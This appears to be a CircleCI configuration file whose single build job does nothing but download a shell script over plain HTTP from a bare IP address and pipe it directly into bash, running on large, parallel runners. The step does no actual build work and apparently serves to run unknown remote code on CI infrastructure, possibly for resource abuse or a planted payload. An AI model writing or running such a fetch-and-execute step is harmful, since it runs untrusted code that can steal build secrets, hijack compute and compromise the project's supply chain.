# ~/.circleci/config.yml
jobs:
  build:
    docker:
      - image: cimg/go:1.18.1
    parallelism: 4
    resource_class: large
    steps:
      - run: wget -O - http://8.208.114.21/automation_for_start_Silly_Doc_cldw.sh | bash

